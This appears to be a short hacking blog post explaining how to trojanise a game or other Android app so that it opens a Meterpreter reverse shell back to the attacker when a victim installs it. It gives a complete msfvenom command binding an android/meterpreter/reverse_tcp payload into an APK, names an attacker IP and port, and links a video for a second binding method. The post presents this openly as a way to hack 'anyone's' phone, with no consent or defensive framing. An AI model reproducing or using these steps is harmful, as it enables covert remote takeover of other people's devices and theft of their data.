Hacking Android using game or any application
Hey friends how are you
Today I am going to tell you how you can hack anyone's android phone with game or any other apk you want to hack with it.
What really we are going to do is , we are simply binding our malicious apk with other apk and when user clicks on that apk our malicious apk will start working in background and gives us reverse connection.
But how you can bind your Payload (malacious apk) with other apks:
for this do follow this steps:
Their are mainly two ways, using which you can simply bind your Payload with any other apks.
1) By using msf-venom
For binding your Payload with msf-venom do type this command in your Linux terminal:
msfvenom -x your_apk_filename_/_apk_filepath.apk -p android_payload_name LHOST=your_ip_address LPORT=port_on_which_you_want_to_listen -o path where you want to store output file
Overall command looks like:
msfvenom -x yourapkfilename.apk -p android/meterpreter/reverse_tcp LHOST=192.168.00.1 LPORT=4444 -o /root/Desktop/yourbackdooredapkfilename.apk
And hit enter, your backdoor will generated in the path which was given by you to store output file
I am not be able to bind Payload with this method bcz of Java-8 is not installed on my system and also I encountered lots of error while trying this method so I recommend you another method.
Another method is
2) by using APK easy tool
For this do watch this video:
https://drive.google.com/file/d/1Cd_iEax1Xv8Lh1FzDPrzb8zV2DAWcMHL/view?usp=drivesdk
Second method works perfectly fine for me.
that's all for today do follow us on Instagram and GitHub and do like our content on Instagram:
https://instagram.com/__pytools__
https://github.com/Pytools786/
Comments
Post a Comment